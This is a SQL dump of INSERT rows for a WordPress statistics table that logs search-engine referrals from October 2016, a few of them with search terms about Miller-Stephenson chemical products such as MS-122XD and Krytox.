INSERT INTO `wp_statistics_search` VALUES (1788, '2016-10-18', 'google', 'www.google.co.in', '', 5596); 
INSERT INTO `wp_statistics_search` VALUES (1789, '2016-10-18', 'google', 'www.google.com', '', 5601); 
INSERT INTO `wp_statistics_search` VALUES (1790, '2016-10-18', 'google', 'www.google.it', '', 5609); 
INSERT INTO `wp_statistics_search` VALUES (1791, '2016-10-18', 'google', 'www.google.co.uk', '', 5610); 
INSERT INTO `wp_statistics_search` VALUES (1792, '2016-10-18', 'yahoo', 'sg.search.yahoo.com', '', 5611); 
INSERT INTO `wp_statistics_search` VALUES (1793, '2016-10-18', 'yahoo', 'sg.search.yahoo.com', '', 5615); 
INSERT INTO `wp_statistics_search` VALUES (1794, '2016-10-18', 'google', 'www.google.co.in', '', 5617); 
INSERT INTO `wp_statistics_search` VALUES (1795, '2016-10-18', 'google', 'www.google.com.sg', '', 5621); 
INSERT INTO `wp_statistics_search` VALUES (1796, '2016-10-18', 'google', 'www.google.nl', '', 5624); 
INSERT INTO `wp_statistics_search` VALUES (1797, '2016-10-18', 'google', 'www.google.com', '', 5632); 
INSERT INTO `wp_statistics_search` VALUES (1798, '2016-10-18', 'google', 'www.google.com', '', 5636); 
INSERT INTO `wp_statistics_search` VALUES (1799, '2016-10-18', 'google', 'www.google.com', '', 5647); 
INSERT INTO `wp_statistics_search` VALUES (1800, '2016-10-18', 'google', 'www.google.com', '', 5649); 
INSERT INTO `wp_statistics_search` VALUES (1801, '2016-10-18', 'google', 'www.google.com', '', 5651); 
INSERT INTO `wp_statistics_search` VALUES (1802, '2016-10-18', 'google', 'www.google.de', '', 5656); 
INSERT INTO `wp_statistics_search` VALUES (1803, '2016-10-18', 'google', 'www.google.ca', '', 5677); 
INSERT INTO `wp_statistics_search` VALUES (1804, '2016-10-18', 'google', 'www.google.ru', '', 5678); 
INSERT INTO `wp_statistics_search` VALUES (1805, '2016-10-18', 'google', 'www.google.com', '', 5680); 
INSERT INTO `wp_statistics_search` VALUES (1806, '2016-10-18', 'google', 'www.google.com', '', 5681); 
INSERT INTO `wp_statistics_search` VALUES (1807, '2016-10-18', 'google', 'www.google.com', '', 5683); 
INSERT INTO `wp_statistics_search` VALUES (1808, '2016-10-18', 'google', 'www.google.com.my', '', 5687); 
INSERT INTO `wp_statistics_search` VALUES (1809, '2016-10-18', 'google', 'www.google.com', '', 5691); 
INSERT INTO `wp_statistics_search` VALUES (1810, '2016-10-18', 'google', 'www.google.com', '', 5698); 
INSERT INTO `wp_statistics_search` VALUES (1811, '2016-10-18', 'yahoo', 'search.yahoo.com', '', 5699); 
INSERT INTO `wp_statistics_search` VALUES (1812, '2016-10-18', 'google', 'www.google.com', '', 5701); 
INSERT INTO `wp_statistics_search` VALUES (1813, '2016-10-18', 'yahoo', 'r.search.yahoo.com', '', 5702); 
INSERT INTO `wp_statistics_search` VALUES (1814, '2016-10-18', 'google', 'www.google.com', '', 5706); 
INSERT INTO `wp_statistics_search` VALUES (1815, '2016-10-18', 'google', 'www.google.com', '', 5709); 
INSERT INTO `wp_statistics_search` VALUES (1816, '2016-10-18', 'google', 'www.google.com', '', 5712); 
INSERT INTO `wp_statistics_search` VALUES (1817, '2016-10-18', 'google', 'www.google.ca', '', 5713); 
INSERT INTO `wp_statistics_search` VALUES (1818, '2016-10-18', 'google', 'www.google.com', '', 5716); 
INSERT INTO `wp_statistics_search` VALUES (1819, '2016-10-18', 'google', 'www.google.com', '', 5717); 
INSERT INTO `wp_statistics_search` VALUES (1820, '2016-10-18', 'yandex', 'yandex.ru', '', 5718); 
INSERT INTO `wp_statistics_search` VALUES (1821, '2016-10-18', 'google', 'www.google.co.uk', '', 5722); 
INSERT INTO `wp_statistics_search` VALUES (1822, '2016-10-18', 'bing', 'www.bing.com', 'ms-122xd mil spec', 5724); 
INSERT INTO `wp_statistics_search` VALUES (1823, '2016-10-18', 'bing', 'www.bing.com', 'miller stephenson', 5725); 
INSERT INTO `wp_statistics_search` VALUES (1824, '2016-10-18', 'google', 'www.google.com', '', 5726); 
INSERT INTO `wp_statistics_search` VALUES (1825, '2016-10-18', 'bing', 'www.bing.com', 'miller stephenson', 5727); 
INSERT INTO `wp_statistics_search` VALUES (1826, '2016-10-18', 'google', 'www.google.com', '', 5729); 
INSERT INTO `wp_statistics_search` VALUES (1827, '2016-10-18', 'google', 'www.google.com', '', 5730); 
INSERT INTO `wp_statistics_search` VALUES (1828, '2016-10-18', 'google', 'www.google.com', '', 5732); 
INSERT INTO `wp_statistics_search` VALUES (1829, '2016-10-18', 'google', 'www.google.com', '', 5734); 
INSERT INTO `wp_statistics_search` VALUES (1830, '2016-10-18', 'google', 'www.google.com', '', 5735); 
INSERT INTO `wp_statistics_search` VALUES (1831, '2016-10-18', 'yandex', 'yandex.ru', '', 5737); 
INSERT INTO `wp_statistics_search` VALUES (1832, '2016-10-18', 'bing', 'www.bing.com', '', 5739); 
INSERT INTO `wp_statistics_search` VALUES (1833, '2016-10-18', 'google', 'www.google.com', '', 5741); 
INSERT INTO `wp_statistics_search` VALUES (1834, '2016-10-18', 'google', 'www.google.co.ve', '', 5745); 
INSERT INTO `wp_statistics_search` VALUES (1835, '2016-10-18', 'google', 'www.google.com', '', 5746); 
INSERT INTO `wp_statistics_search` VALUES (1836, '2016-10-18', 'google', 'www.google.com', '', 5748); 
INSERT INTO `wp_statistics_search` VALUES (1837, '2016-10-18', 'google', 'www.google.ca', '', 5749); 
INSERT INTO `wp_statistics_search` VALUES (1838, '2016-10-18', 'google', 'www.google.com', '', 5752); 
INSERT INTO `wp_statistics_search` VALUES (1839, '2016-10-18', 'google', 'www.google.com', '', 5754); 
INSERT INTO `wp_statistics_search` VALUES (1840, '2016-10-18', 'google', 'www.google.fr', '', 5761); 
INSERT INTO `wp_statistics_search` VALUES (1841, '2016-10-18', 'google', 'www.google.com', '', 5762); 
INSERT INTO `wp_statistics_search` VALUES (1842, '2016-10-18', 'google', 'www.google.com', '', 5763); 
INSERT INTO `wp_statistics_search` VALUES (1843, '2016-10-18', 'bing', 'www.bing.com', 'epikure w', 5765); 
INSERT INTO `wp_statistics_search` VALUES (1844, '2016-10-18', 'google', 'www.google.com', '', 5772); 
INSERT INTO `wp_statistics_search` VALUES (1845, '2016-10-18', 'google', 'www.google.com', '', 5773); 
INSERT INTO `wp_statistics_search` VALUES (1846, '2016-10-18', 'google', 'www.google.com', '', 5775); 
INSERT INTO `wp_statistics_search` VALUES (1847, '2016-10-18', 'google', 'www.google.com', '', 5776); 
INSERT INTO `wp_statistics_search` VALUES (1848, '2016-10-18', 'google', 'www.google.com', '', 5779); 
INSERT INTO `wp_statistics_search` VALUES (1849, '2016-10-18', 'google', 'www.google.com', '', 5782); 
INSERT INTO `wp_statistics_search` VALUES (1850, '2016-10-18', 'google', 'www.google.com', '', 5784); 
INSERT INTO `wp_statistics_search` VALUES (1851, '2016-10-18', 'google', 'www.google.com', '', 5786); 
INSERT INTO `wp_statistics_search` VALUES (1852, '2016-10-18', 'google', 'www.google.com', '', 5795); 
INSERT INTO `wp_statistics_search` VALUES (1853, '2016-10-18', 'google', 'www.google.com', '', 5796); 
INSERT INTO `wp_statistics_search` VALUES (1854, '2016-10-18', 'google', 'www.google.com', '', 5801); 
INSERT INTO `wp_statistics_search` VALUES (1855, '2016-10-18', 'google', 'www.google.com', '', 5802); 
INSERT INTO `wp_statistics_search` VALUES (1856, '2016-10-18', 'google', 'www.google.ca', '', 5803); 
INSERT INTO `wp_statistics_search` VALUES (1857, '2016-10-18', 'google', 'www.google.com', '', 5809); 
INSERT INTO `wp_statistics_search` VALUES (1858, '2016-10-18', 'google', 'www.google.com', '', 5811); 
INSERT INTO `wp_statistics_search` VALUES (1859, '2016-10-18', 'google', 'www.google.com', '', 5817); 
INSERT INTO `wp_statistics_search` VALUES (1860, '2016-10-18', 'google', 'www.google.com', '', 5819); 
INSERT INTO `wp_statistics_search` VALUES (1861, '2016-10-18', 'google', 'www.google.com', '', 5823); 
INSERT INTO `wp_statistics_search` VALUES (1862, '2016-10-18', 'google', 'www.google.com', '', 5826); 
INSERT INTO `wp_statistics_search` VALUES (1863, '2016-10-18', 'google', 'www.google.com', '', 5827); 
INSERT INTO `wp_statistics_search` VALUES (1864, '2016-10-18', 'google', 'www.google.ca', '', 5831); 
INSERT INTO `wp_statistics_search` VALUES (1865, '2016-10-18', 'google', 'www.google.com', '', 5832); 
INSERT INTO `wp_statistics_search` VALUES (1866, '2016-10-18', 'google', 'www.google.com', '', 5835); 
INSERT INTO `wp_statistics_search` VALUES (1867, '2016-10-18', 'google', 'www.google.com', '', 5841); 
INSERT INTO `wp_statistics_search` VALUES (1868, '2016-10-18', 'google', 'www.google.com', '', 5846); 
INSERT INTO `wp_statistics_search` VALUES (1869, '2016-10-18', 'yahoo', 'r.search.yahoo.com', '', 5848); 
INSERT INTO `wp_statistics_search` VALUES (1870, '2016-10-18', 'google', 'www.google.com', '', 5849); 
INSERT INTO `wp_statistics_search` VALUES (1871, '2016-10-18', 'bing', 'www.bing.com', 'miller stephenson chemi', 5851); 
INSERT INTO `wp_statistics_search` VALUES (1872, '2016-10-18', 'google', 'www.google.com', '', 5853); 
INSERT INTO `wp_statistics_search` VALUES (1873, '2016-10-18', 'google', 'www.google.com', '', 5856); 
INSERT INTO `wp_statistics_search` VALUES (1874, '2016-10-18', 'google', 'www.google.com', '', 5858); 
INSERT INTO `wp_statistics_search` VALUES (1875, '2016-10-18', 'google', 'www.google.com', '', 5859); 
INSERT INTO `wp_statistics_search` VALUES (1876, '2016-10-18', 'google', 'www.google.ca', '', 5860); 
INSERT INTO `wp_statistics_search` VALUES (1877, '2016-10-18', 'google', 'www.google.com', '', 5861); 
INSERT INTO `wp_statistics_search` VALUES (1878, '2016-10-18', 'google', 'www.google.com', '', 5863); 
INSERT INTO `wp_statistics_search` VALUES (1879, '2016-10-18', 'google', 'www.google.com', '', 5868); 
INSERT INTO `wp_statistics_search` VALUES (1880, '2016-10-18', 'google', 'www.google.com', '', 5869); 
INSERT INTO `wp_statistics_search` VALUES (1881, '2016-10-18', 'google', 'www.google.com', '', 5871); 
INSERT INTO `wp_statistics_search` VALUES (1882, '2016-10-18', 'google', 'www.google.com', '', 5876); 
INSERT INTO `wp_statistics_search` VALUES (1883, '2016-10-18', 'google', 'www.google.com', '', 5877); 
INSERT INTO `wp_statistics_search` VALUES (1884, '2016-10-18', 'google', 'www.google.com', '', 5880); 
INSERT INTO `wp_statistics_search` VALUES (1885, '2016-10-18', 'google', 'www.google.com', '', 5881); 
INSERT INTO `wp_statistics_search` VALUES (1886, '2016-10-18', 'google', 'www.google.com', '', 5882); 
INSERT INTO `wp_statistics_search` VALUES (1887, '2016-10-18', 'google', 'www.google.com', '', 5886); 
INSERT INTO `wp_statistics_search` VALUES (1888, '2016-10-18', 'google', 'www.google.ca', '', 5889); 
INSERT INTO `wp_statistics_search` VALUES (1889, '2016-10-18', 'google', 'www.google.com', '', 5892); 
INSERT INTO `wp_statistics_search` VALUES (1890, '2016-10-18', 'google', 'www.google.com', '', 5893); 
INSERT INTO `wp_statistics_search` VALUES (1891, '2016-10-18', 'google', 'www.google.com', '', 5894); 
INSERT INTO `wp_statistics_search` VALUES (1892, '2016-10-18', 'google', 'www.google.com', '', 5895); 
INSERT INTO `wp_statistics_search` VALUES (1893, '2016-10-18', 'google', 'www.google.com', '', 5902); 
INSERT INTO `wp_statistics_search` VALUES (1894, '2016-10-18', 'google', 'www.google.com', '', 5903); 
INSERT INTO `wp_statistics_search` VALUES (1895, '2016-10-18', 'google', 'www.google.com', '', 5904); 
INSERT INTO `wp_statistics_search` VALUES (1896, '2016-10-18', 'yahoo', 'r.search.yahoo.com', '', 5910); 
INSERT INTO `wp_statistics_search` VALUES (1897, '2016-10-18', 'yahoo', 'search.yahoo.com', '', 5912); 
INSERT INTO `wp_statistics_search` VALUES (1898, '2016-10-18', 'yahoo', 'r.search.yahoo.com', '', 5923); 
INSERT INTO `wp_statistics_search` VALUES (1899, '2016-10-18', 'google', 'www.google.com', '', 5925); 
INSERT INTO `wp_statistics_search` VALUES (1900, '2016-10-18', 'google', 'www.google.com', '', 5935); 
INSERT INTO `wp_statistics_search` VALUES (1901, '2016-10-18', 'bing', 'www.bing.com', 'miller stephenson', 5936); 
INSERT INTO `wp_statistics_search` VALUES (1902, '2016-10-18', 'google', 'www.google.com', '', 5947); 
INSERT INTO `wp_statistics_search` VALUES (1903, '2016-10-18', 'google', 'www.google.com', '', 5950); 
INSERT INTO `wp_statistics_search` VALUES (1904, '2016-10-18', 'google', 'www.google.com', '', 5952); 
INSERT INTO `wp_statistics_search` VALUES (1905, '2016-10-18', 'google', 'www.google.co.nz', '', 5957); 
INSERT INTO `wp_statistics_search` VALUES (1906, '2016-10-18', 'google', 'www.google.ca', '', 5958); 
INSERT INTO `wp_statistics_search` VALUES (1907, '2016-10-18', 'google', 'www.google.com', '', 5959); 
INSERT INTO `wp_statistics_search` VALUES (1908, '2016-10-18', 'bing', 'www.bing.com', '', 5960); 
INSERT INTO `wp_statistics_search` VALUES (1909, '2016-10-18', 'google', 'www.google.com', '', 5966); 
INSERT INTO `wp_statistics_search` VALUES (1910, '2016-10-18', 'google', 'www.google.com', '', 5967); 
INSERT INTO `wp_statistics_search` VALUES (1911, '2016-10-18', 'google', 'www.google.com', '', 5969); 
INSERT INTO `wp_statistics_search` VALUES (1912, '2016-10-18', 'google', 'www.google.com', '', 5970); 
INSERT INTO `wp_statistics_search` VALUES (1913, '2016-10-18', 'google', 'www.google.ca', '', 5972); 
INSERT INTO `wp_statistics_search` VALUES (1914, '2016-10-18', 'google', 'www.google.com', '', 5974); 
INSERT INTO `wp_statistics_search` VALUES (1915, '2016-10-18', 'google', 'www.google.com', '', 5975); 
INSERT INTO `wp_statistics_search` VALUES (1916, '2016-10-18', 'google', 'www.google.com', '', 5977); 
INSERT INTO `wp_statistics_search` VALUES (1917, '2016-10-18', 'google', 'www.google.com', 'www.miller-stephenson.com', 5983); 
INSERT INTO `wp_statistics_search` VALUES (1918, '2016-10-18', 'google', 'www.google.com', '', 5988); 
INSERT INTO `wp_statistics_search` VALUES (1919, '2016-10-18', 'google', 'www.google.com', '', 5991); 
INSERT INTO `wp_statistics_search` VALUES (1920, '2016-10-18', 'google', 'www.google.com', '', 5995); 
INSERT INTO `wp_statistics_search` VALUES (1921, '2016-10-18', 'google', 'www.google.com', '', 6001); 
INSERT INTO `wp_statistics_search` VALUES (1922, '2016-10-18', 'google', 'www.google.com', '', 6005); 
INSERT INTO `wp_statistics_search` VALUES (1923, '2016-10-18', 'google', 'www.google.com', '', 6007); 
INSERT INTO `wp_statistics_search` VALUES (1924, '2016-10-18', 'google', 'www.google.com', '', 6008); 
INSERT INTO `wp_statistics_search` VALUES (1925, '2016-10-18', 'google', 'www.google.com', '', 6009); 
INSERT INTO `wp_statistics_search` VALUES (1926, '2016-10-18', 'google', 'www.google.com', '', 6011); 
INSERT INTO `wp_statistics_search` VALUES (1927, '2016-10-18', 'google', 'www.google.com', '', 6013); 
INSERT INTO `wp_statistics_search` VALUES (1928, '2016-10-18', 'google', 'www.google.com', '', 6017); 
INSERT INTO `wp_statistics_search` VALUES (1929, '2016-10-18', 'google', 'www.google.co.kr', '', 6018); 
INSERT INTO `wp_statistics_search` VALUES (1930, '2016-10-19', 'google', 'www.google.com', '', 6021); 
INSERT INTO `wp_statistics_search` VALUES (1931, '2016-10-19', 'google', 'www.google.com', '', 6022); 
INSERT INTO `wp_statistics_search` VALUES (1932, '2016-10-19', 'google', 'www.google.com', '', 6024); 
INSERT INTO `wp_statistics_search` VALUES (1933, '2016-10-19', 'google', 'www.google.com', '', 6026); 
INSERT INTO `wp_statistics_search` VALUES (1934, '2016-10-19', 'google', 'www.google.com', 'ptfe release agents', 6034); 
INSERT INTO `wp_statistics_search` VALUES (1935, '2016-10-19', 'google', 'www.google.co.jp', '', 6047); 
INSERT INTO `wp_statistics_search` VALUES (1936, '2016-10-19', 'google', 'www.google.com', '', 6050); 
INSERT INTO `wp_statistics_search` VALUES (1937, '2016-10-19', 'google', 'www.google.co.jp', '', 6053); 
INSERT INTO `wp_statistics_search` VALUES (1938, '2016-10-19', 'google', 'www.google.com', '', 6057); 
INSERT INTO `wp_statistics_search` VALUES (1939, '2016-10-19', 'google', 'www.google.ca', '', 6064); 
INSERT INTO `wp_statistics_search` VALUES (1940, '2016-10-19', 'google', 'www.google.com', '', 6068); 
INSERT INTO `wp_statistics_search` VALUES (1941, '2016-10-19', 'google', 'www.google.ca', '', 6072); 
INSERT INTO `wp_statistics_search` VALUES (1942, '2016-10-19', 'google', 'www.google.co.id', '', 6077); 
INSERT INTO `wp_statistics_search` VALUES (1943, '2016-10-19', 'google', 'www.google.ca', '', 6078); 
INSERT INTO `wp_statistics_search` VALUES (1944, '2016-10-19', 'google', 'www.google.com', '', 6094); 
INSERT INTO `wp_statistics_search` VALUES (1945, '2016-10-19', 'google', 'www.google.co.th', '', 6099); 
INSERT INTO `wp_statistics_search` VALUES (1946, '2016-10-19', 'google', 'www.google.co.jp', '', 6104); 
INSERT INTO `wp_statistics_search` VALUES (1947, '2016-10-19', 'google', 'www.google.co.kr', '', 6114); 
INSERT INTO `wp_statistics_search` VALUES (1948, '2016-10-19', 'google', 'www.google.com.tr', '', 6120); 
INSERT INTO `wp_statistics_search` VALUES (1949, '2016-10-19', 'google', 'www.google.pl', '', 6128); 
INSERT INTO `wp_statistics_search` VALUES (1950, '2016-10-19', 'google', 'www.google.co.in', '', 6129); 
INSERT INTO `wp_statistics_search` VALUES (1951, '2016-10-19', 'bing', 'www.bing.com', 'chemıcal companıes ltd contact us mail', 6155); 
INSERT INTO `wp_statistics_search` VALUES (1952, '2016-10-19', 'google', 'www.google.si', '', 6161); 
INSERT INTO `wp_statistics_search` VALUES (1953, '2016-10-19', 'google', 'www.google.pl', '', 6169); 
INSERT INTO `wp_statistics_search` VALUES (1954, '2016-10-19', 'google', 'www.google.pl', '', 6176); 
INSERT INTO `wp_statistics_search` VALUES (1955, '2016-10-19', 'google', 'www.google.es', '', 6180); 
INSERT INTO `wp_statistics_search` VALUES (1956, '2016-10-19', 'bing', 'www.bing.com', '', 6190); 
INSERT INTO `wp_statistics_search` VALUES (1957, '2016-10-19', 'google', 'www.google.co.in', '', 6193); 
INSERT INTO `wp_statistics_search` VALUES (1958, '2016-10-19', 'google', 'www.google.co.in', '', 6194); 
INSERT INTO `wp_statistics_search` VALUES (1959, '2016-10-19', 'google', 'www.google.co.in', '', 6196); 
INSERT INTO `wp_statistics_search` VALUES (1960, '2016-10-19', 'google', 'www.google.ru', '', 6202); 
INSERT INTO `wp_statistics_search` VALUES (1961, '2016-10-19', 'google', 'www.google.com.tw', '', 6215); 
INSERT INTO `wp_statistics_search` VALUES (1962, '2016-10-19', 'google', 'www.google.co.uk', '', 6218); 
INSERT INTO `wp_statistics_search` VALUES (1963, '2016-10-19', 'google', 'www.google.com', '', 6226); 
INSERT INTO `wp_statistics_search` VALUES (1964, '2016-10-19', 'google', 'www.google.ch', '', 6227); 
INSERT INTO `wp_statistics_search` VALUES (1965, '2016-10-19', 'google', 'www.google.pl', '', 6228); 
INSERT INTO `wp_statistics_search` VALUES (1966, '2016-10-19', 'google', 'www.google.com', '', 6236); 
INSERT INTO `wp_statistics_search` VALUES (1967, '2016-10-19', 'google', 'www.google.com', '', 6237); 
INSERT INTO `wp_statistics_search` VALUES (1968, '2016-10-19', 'google', 'www.google.co.il', '', 6241); 
INSERT INTO `wp_statistics_search` VALUES (1969, '2016-10-19', 'google', 'www.google.se', '', 6246); 
INSERT INTO `wp_statistics_search` VALUES (1970, '2016-10-19', 'bing', 'www.bing.com', 'miller stephanson   MS-482', 6251); 
INSERT INTO `wp_statistics_search` VALUES (1971, '2016-10-19', 'google', 'www.google.com', 'Krytox GPL 227 FG', 6255); 
INSERT INTO `wp_statistics_search` VALUES (1972, '2016-10-19', 'google', 'www.google.com', '', 6257); 
INSERT INTO `wp_statistics_search` VALUES (1973, '2016-10-19', 'google', 'www.google.com', '', 6264); 
INSERT INTO `wp_statistics_search` VALUES (1974, '2016-10-19', 'google', 'www.google.co.uk', '', 6265); 
INSERT INTO `wp_statistics_search` VALUES (1975, '2016-10-19', 'google', 'www.google.com', '', 6267); 
INSERT INTO `wp_statistics_search` VALUES (1976, '2016-10-19', 'google', 'www.google.com.kh', '', 6268); 
INSERT INTO `wp_statistics_search` VALUES (1977, '2016-10-19', 'google', 'www.google.com', '', 6273); 
INSERT INTO `wp_statistics_search` VALUES (1978, '2016-10-19', 'google', 'www.google.com', '', 6275); 
INSERT INTO `wp_statistics_search` VALUES (1979, '2016-10-19', 'google', 'www.google.com', '', 6279); 
INSERT INTO `wp_statistics_search` VALUES (1980, '2016-10-19', 'google', 'www.google.com', '', 6280); 
INSERT INTO `wp_statistics_search` VALUES (1981, '2016-10-19', 'bing', 'www.bing.com', 'miller stephenson', 6284); 
INSERT INTO `wp_statistics_search` VALUES (1982, '2016-10-19', 'google', 'www.google.de', '', 6290); 
INSERT INTO `wp_statistics_search` VALUES (1983, '2016-10-19', 'bing', 'www.bing.com', 'Fairfield county CT chemicals companies', 6299); 
INSERT INTO `wp_statistics_search` VALUES (1984, '2016-10-19', 'google', 'www.google.com', '', 6308); 
INSERT INTO `wp_statistics_search` VALUES (1985, '2016-10-19', 'google', 'www.google.cl', '', 6310); 
INSERT INTO `wp_statistics_search` VALUES (1986, '2016-10-19', 'google', 'www.google.com', '', 6313); 
INSERT INTO `wp_statistics_search` VALUES (1987, '2016-10-19', 'google', 'www.google.co.in', '', 6314); 
INSERT INTO `wp_statistics_search` VALUES (1988, '2016-10-19', 'bing', 'www.bing.com', 'miller lubricants', 6316); 
INSERT INTO `wp_statistics_search` VALUES (1989, '2016-10-19', 'google', 'www.google.com', '', 6319); 
INSERT INTO `wp_statistics_search` VALUES (1990, '2016-10-19', 'google', 'www.google.ca', '', 6320); 
INSERT INTO `wp_statistics_search` VALUES (1991, '2016-10-19', 'google', 'www.google.com', '', 6325); 
INSERT INTO `wp_statistics_search` VALUES (1992, '2016-10-19', 'google', 'www.google.com', '', 6326); 
INSERT INTO `wp_statistics_search` VALUES (1993, '2016-10-19', 'google', 'www.google.com', '', 6327); 
INSERT INTO `wp_statistics_search` VALUES (1994, '2016-10-19', 'google', 'www.google.com', '', 6328); 
INSERT INTO `wp_statistics_search` VALUES (1995, '2016-10-19', 'google', 'www.google.com', '', 6329); 
INSERT INTO `wp_statistics_search` VALUES (1996, '2016-10-19', 'google', 'www.google.com', '', 6330); 
INSERT INTO `wp_statistics_search` VALUES (1997, '2016-10-19', 'google', 'www.google.com', '', 6331); 
INSERT INTO `wp_statistics_search` VALUES (1998, '2016-10-19', 'google', 'www.google.hu', '', 6333); 
INSERT INTO `wp_statistics_search` VALUES (1999, '2016-10-19', 'google', 'www.google.com', '', 6337); 
INSERT INTO `wp_statistics_search` VALUES (2000, '2016-10-19', 'google', 'www.google.com', '', 6338); 
INSERT INTO `wp_statistics_search` VALUES (2001, '2016-10-19', 'google', 'www.google.com', '', 6344); 
INSERT INTO `wp_statistics_search` VALUES (2002, '2016-10-19', 'google', 'www.google.com', '', 6345); 
INSERT INTO `wp_statistics_search` VALUES (2003, '2016-10-19', 'google', 'www.google.com', '', 6348); 
INSERT INTO `wp_statistics_search` VALUES (2004, '2016-10-19', 'bing', 'www.bing.com', 'MILLER STEPHENSON CHEMICAL CO. ACRYLIC COATING  MS-465C', 6349); 
INSERT INTO `wp_statistics_search` VALUES (2005, '2016-10-19', 'google', 'www.google.ca', '', 6351); 
INSERT INTO `wp_statistics_search` VALUES (2006, '2016-10-19', 'google', 'www.google.com', '', 6352); 
INSERT INTO `wp_statistics_search` VALUES (2007, '2016-10-19', 'google', 'www.google.com', '', 6358); 
INSERT INTO `wp_statistics_search` VALUES (2008, '2016-10-19', 'google', 'www.google.com', '', 6359); 
INSERT INTO `wp_statistics_search` VALUES (2009, '2016-10-19', 'google', 'www.google.ca', '', 6362); 
INSERT INTO `wp_statistics_search` VALUES (2010, '2016-10-19', 'google', 'www.google.com', '', 6363); 
INSERT INTO `wp_statistics_search` VALUES (2011, '2016-10-19', 'google', 'www.google.com', '', 6373); 
INSERT INTO `wp_statistics_search` VALUES (2012, '2016-10-19', 'google', 'www.google.com', '', 6375); 
INSERT INTO `wp_statistics_search` VALUES (2013, '2016-10-19', 'google', 'www.google.com', '', 6376); 
INSERT INTO `wp_statistics_search` VALUES (2014, '2016-10-19', 'google', 'www.google.com', '', 6383); 
INSERT INTO `wp_statistics_search` VALUES (2015, '2016-10-19', 'google', 'www.google.com', '', 6384); 
INSERT INTO `wp_statistics_search` VALUES (2016, '2016-10-19', 'google', 'www.google.com', '', 6385); 
INSERT INTO `wp_statistics_search` VALUES (2017, '2016-10-19', 'google', 'www.google.ca', '', 6386); 
INSERT INTO `wp_statistics_search` VALUES (2018, '2016-10-19', 'google', 'www.google.com', '', 6388); 
INSERT INTO `wp_statistics_search` VALUES (2019, '2016-10-19', 'google', 'www.google.com', '', 6394); 
INSERT INTO `wp_statistics_search` VALUES (2020, '2016-10-19', 'google', 'www.google.com', '', 6395); 
INSERT INTO `wp_statistics_search` VALUES (2021, '2016-10-19', 'google', 'www.google.com', '', 6398); 
INSERT INTO `wp_statistics_search` VALUES (2022, '2016-10-19', 'google', 'www.google.com', '', 6401); 
INSERT INTO `wp_statistics_search` VALUES (2023, '2016-10-19', 'google', 'www.google.com', '', 6403); 
INSERT INTO `wp_statistics_search` VALUES (2024, '2016-10-19', 'google', 'www.google.com', '', 6404); 
INSERT INTO `wp_statistics_search` VALUES (2025, '2016-10-19', 'google', 'www.google.com', '', 6406); 
INSERT INTO `wp_statistics_search` VALUES (2026, '2016-10-19', 'google', 'www.google.pl', '', 6407); 
INSERT INTO `wp_statistics_search` VALUES (2027, '2016-10-19', 'google', 'www.google.com', '', 6410); 
INSERT INTO `wp_statistics_search` VALUES (2028, '2016-10-19', 'google', 'www.google.com', '', 6411); 
INSERT INTO `wp_statistics_search` VALUES (2029, '2016-10-19', 'google', 'www.google.com', '', 6412); 
INSERT INTO `wp_statistics_search` VALUES (2030, '2016-10-19', 'google', 'www.google.com', '', 6417); 
INSERT INTO `wp_statistics_search` VALUES (2031, '2016-10-19', 'google', 'www.google.com', '', 6422); 
INSERT INTO `wp_statistics_search` VALUES (2032, '2016-10-19', 'google', 'www.google.com', '', 6424); 
INSERT INTO `wp_statistics_search` VALUES (2033, '2016-10-19', 'google', 'www.google.com', '', 6425); 
INSERT INTO `wp_statistics_search` VALUES (2034, '2016-10-19', 'bing', 'www.bing.com', 'miller stephenson chemical', 6426); 
INSERT INTO `wp_statistics_search` VALUES (2035, '2016-10-19', 'google', 'www.google.com', '', 6427); 
INSERT INTO `wp_statistics_search` VALUES (2036, '2016-10-19', 'google', 'www.google.com', '', 6433); 
INSERT INTO `wp_statistics_search` VALUES (2037, '2016-10-19', 'google', 'www.google.com', '', 6435); 
INSERT INTO `wp_statistics_search` VALUES (2038, '2016-10-19', 'google', 'www.google.com', '', 6436); 
INSERT INTO `wp_statistics_search` VALUES (2039, '2016-10-19', 'google', 'www.google.com', '', 6441); 
INSERT INTO `wp_statistics_search` VALUES (2040, '2016-10-19', 'google', 'www.google.ca', '', 6443); 
INSERT INTO `wp_statistics_search` VALUES (2041, '2016-10-19', 'google', 'www.google.com', '', 6445); 
INSERT INTO `wp_statistics_search` VALUES (2042, '2016-10-19', 'google', 'www.google.com', '', 6447); 
INSERT INTO `wp_statistics_search` VALUES (2043, '2016-10-19', 'google', 'www.google.com', '', 6448); 
INSERT INTO `wp_statistics_search` VALUES (2044, '2016-10-19', 'google', 'www.google.com', '', 6449); 
INSERT INTO `wp_statistics_search` VALUES (2045, '2016-10-19', 'google', 'www.google.com', '', 6451); 
INSERT INTO `wp_statistics_search` VALUES (2046, '2016-10-19', 'google', 'www.google.com', '', 6454); 
INSERT INTO `wp_statistics_search` VALUES (2047, '2016-10-19', 'google', 'www.google.com', '', 6455); 
INSERT INTO `wp_statistics_search` VALUES (2048, '2016-10-19', 'google', 'www.google.com', '', 6458); 
INSERT INTO `wp_statistics_search` VALUES (2049, '2016-10-19', 'google', 'www.google.com', '', 6460); 
INSERT INTO `wp_statistics_search` VALUES (2050, '2016-10-19', 'google', 'www.google.com', '', 6461); 
INSERT INTO `wp_statistics_search` VALUES (2051, '2016-10-19', 'google', 'www.google.ca', '', 6463); 
INSERT INTO `wp_statistics_search` VALUES (2052, '2016-10-19', 'google', 'www.google.com', '', 6464); 
INSERT INTO `wp_statistics_search` VALUES (2053, '2016-10-19', 'google', 'www.google.com', '', 6466); 
INSERT INTO `wp_statistics_search` VALUES (2054, '2016-10-19', 'google', 'www.google.com', '', 6467); 
INSERT INTO `wp_statistics_search` VALUES (2055, '2016-10-19', 'google', 'www.google.com', '', 6468); 
INSERT INTO `wp_statistics_search` VALUES (2056, '2016-10-19', 'google', 'www.google.com', '', 6469); 
INSERT INTO `wp_statistics_search` VALUES (2057, '2016-10-19', 'google', 'www.google.com', '', 6470); 
INSERT INTO `wp_statistics_search` VALUES (2058, '2016-10-19', 'google', 'www.google.com', '', 6472); 
INSERT INTO `wp_statistics_search` VALUES (2059, '2016-10-19', 'bing', 'www.bing.com', '', 6475); 
INSERT INTO `wp_statistics_search` VALUES (2060, '2016-10-19', 'google', 'www.google.com', '', 6478); 
INSERT INTO `wp_statistics_search` VALUES (2061, '2016-10-19', 'google', 'www.google.com', '', 6481); 
INSERT INTO `wp_statistics_search` VALUES (2062, '2016-10-19', 'google', 'www.google.com', '', 6483); 
